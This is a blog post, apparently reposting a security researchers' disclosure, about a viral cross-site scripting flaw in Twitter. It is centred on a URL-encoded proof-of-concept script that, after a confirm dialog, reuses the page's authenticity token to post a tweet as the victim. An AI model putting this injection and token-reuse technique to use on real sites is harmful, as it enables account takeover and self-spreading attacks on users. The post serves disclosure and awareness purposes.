Home > Emerging Threats > Twitter Viral XSS

Twitter Viral XSS

@ Researchers Make Wormy Twitter Attack

>> http://www.pcworld.com/businesscenter/article/161631/researchers_make_wormy_twitter_attack.html

@ http://www.securescience.net/twoubledtwitter.html

—————————————————————————————————-

<html>
Link for Twitter Viral XSS Proof of Concept:
<p><a href=”http://twitter.com/help/request_source?device_source%5Bname%5D=%3Cscript%3Eif%28confirm%28%22Combining+Twitter+and+it%27s+viral+market+affect%2C+an+attacker+could+do+much+more+than+our+simple+proof+of+concept%2E+

They+could+use+this+to+infect+massive+amounts+of+twitter+users+within+hours+using+remote+exploit+code%2C+as+well+as+steal+their+twitter

+account+information%2C+all+without+the+victims+knowledge%2E%5Cn%5CnIf+you+proceed%2C+a+tweet+will+be+posted+automatically+AS+YOURSELF%2E+The+contents+of+this+tweet+is+innocuous+but

+demonstrates+the+viral+capabilities%2E+By+clicking+OK+you+will+demonstrate+this+flaw%2E+Clicking+cancel+will+leave+this+demonstration

+without+any+effects%2E%22%29%29%7Ba%3Dfunction%28p%2Ct%2Cn%29%7Bvar+o%3Ddocument%2EcreateElement%28t%29%3Bif%28n%29%7Bo%2Etype%3D%22hidden%22%3Bo%2Ename%3Dn%7D%3Bp%2EappendChild%28o%29%3Breturn+o%3B%7D%3Bf%3Da%28document%2Ebody%2C%22form%22%29%3Bf%2Eaction%3D%22%2Fstatus%2Fupdate%22%3Bf%2Emethod%3D%22POST%22%3Ba%28f%2C%22input%22%2C%22authenticity%5Ftoken%22%29%2Evalue%3Dtwttr%2Eform%5Fauthenticity%5Ftoken%3Ba%28f%2C%22input%22%2C%22status%22%29%2Evalue%3D%22%40XSSExploits+I+just+got+owned%21%22%3Bf%2Esubmit%28%29%3B%7Delse%7Blocation%2Ehref%3D%22http%3A%2F%2Fwww%2Esecurescience%2Ecom%2F%22%7D%3C%2Fscript%3E”>Link</a>
<p>Link is benign, accompanied with a choice of whether you want to be exploited or not, and an explanation of the process. If you accept, your account will have posted a reply to XSSExploits with “I just got owned!”.
<p>
For more on how severe XSS can get please read <a href=”http://www.securescience.com/FILES/securescience/10237/335_PH_EXP_05.pdf”>Chapter 5</a> of Phishing Exposed.
<p> Research conducted by Lance James and Eric Wastl

</html>

—————————————————————————————————-

Take note that this is NOT platform dependent.  I hope attackers will not take advantage of this code!

  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: